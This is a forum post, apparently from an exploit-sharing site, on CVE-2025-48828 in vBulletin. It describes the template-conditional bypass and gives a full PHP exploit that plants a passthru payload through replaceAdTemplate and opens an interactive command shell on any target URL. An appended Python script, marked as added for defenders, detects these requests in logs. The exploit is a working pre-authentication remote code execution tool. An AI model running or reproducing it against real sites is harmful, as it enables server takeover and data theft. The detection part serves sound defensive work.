[CVE-2025-48828] Pre-Auth vBulletin RCE (replaceAdTemplate)
STAFF TEAM
#1
Certain vBulletin versions might allow attackers to execute arbitrary PHP code by abusing Template Conditionals in the template engine. By crafting template code in an alternative PHP function invocation syntax, such as the "var_dump"("test") syntax, attackers can bypass security checks and execute arbitrary PHP code, as exploited in the wild in May 2025.

Exploit Code:
Code:
<?php

/*
    -----------------------------------------------------------------
    vBulletin (replaceAdTemplate) Remote Code Execution Vulnerability
    -----------------------------------------------------------------
    +-------------------------------------------------------------------------+
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will not be responsible for any damage. |
    +-------------------------------------------------------------------------+
    [-] Technical Writeup:
    https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
*/

set_time_limit(0);
error_reporting(E_ERROR);

print "\n+---------------------------------------------------------------------+";
print "\n| vBulletin (replaceAdTemplate) Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";

if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");

if ($argc != 2)
{
    print "\nUsage......: php $argv[0] <URL>\n";
    print "\nExample....: php $argv[0] http://localhost/vb/";
    print "\nExample....: php $argv[0] https://vbulletin.com/\n\n";
    die();
}

$params = [
        "routestring" => "ajax/api/ad/replaceAdTemplate",
        "styleid" => "1",
        "location" => "d4rkf0rum5",
        "template" => "<vb:if condition='\"passthru\"(\$_POST[\"cmd\"])'></vb:if>"
];

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $argv[1]);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));

if (curl_exec($ch) !== "null") die("\n[-] Exploit failed, unable to create template!\n\n");

$params = ["routestring" => "ajax/render/ad_d4rkf0rum5"];

while (1)
{
    print "\nvBulletin-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    $params["cmd"] = $cmd;
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
    preg_match('/(.+)\{"template":/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}
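
For defenders, the two requests the post describes can be detected in logged request bodies. The following is an added example, not part of the original post or of vBulletin: it assumes a WAF or reverse proxy records each request as a (client IP, form-encoded body) pair, and the function name, severity labels and sample traffic are hypothetical.

```python
import re
from urllib.parse import parse_qs, urlencode

REPLACE_ROUTE = "ajax/api/ad/replaceadtemplate"   # route named in the post (lowercased)
RENDER_PREFIX = "ajax/render/ad_"                 # render route requested afterwards
# condition="..." attribute of a <vb:if> / <vb:elseif> tag
VB_COND = re.compile(r"""<vb:(?:else)?if\s+condition\s*=\s*(["'])(.*?)\1\s*/?>""",
                     re.S | re.I)
# A quoted string followed directly by "(", e.g. "var_dump"("test")
QUOTED_CALL = re.compile(r"""(["'])[A-Za-z_\\][\w\\]*\1\s*\(""")

def scan(requests):
    """requests: iterable of (client_ip, form_encoded_body) in arrival order."""
    findings, writers = [], set()
    for ip, body in requests:
        form = parse_qs(body, keep_blank_values=True)
        route = form.get("routestring", [""])[0].strip("/").lower()
        if route == REPLACE_ROUTE:
            writers.add(ip)  # remember who wrote an ad template
            tpl = form.get("template", [""])[0]
            hit = any(QUOTED_CALL.search(c) for _, c in VB_COND.findall(tpl))
            findings.append((ip, "high" if hit else "medium", "replaceAdTemplate"))
        elif route.startswith(RENDER_PREFIX) and ip in writers:
            findings.append((ip, "high", "render after replaceAdTemplate"))
    return findings

# Constructed sample traffic (documentation IP ranges, not real logs).
SAMPLE = [
    ("198.51.100.7", urlencode({
        "routestring": "ajax/api/ad/replaceAdTemplate", "styleid": "1",
        "location": "x1",
        "template": "<vb:if condition='\"var_dump\"(\"test\")'></vb:if>"})),
    ("198.51.100.7", urlencode({"routestring": "ajax/render/ad_x1"})),
    ("203.0.113.20", urlencode({
        "routestring": "ajax/api/ad/replaceAdTemplate", "styleid": "1",
        "location": "x2", "template": "<b>banner</b>"})),
    ("203.0.113.9", urlencode({"routestring": "forum/general", "page": "2"})),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding, sep="\t")
```

The quoted-string-call pattern only inspects conditional attributes, so ordinary array lookups such as `$user['userid']` in a template condition do not raise the severity.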
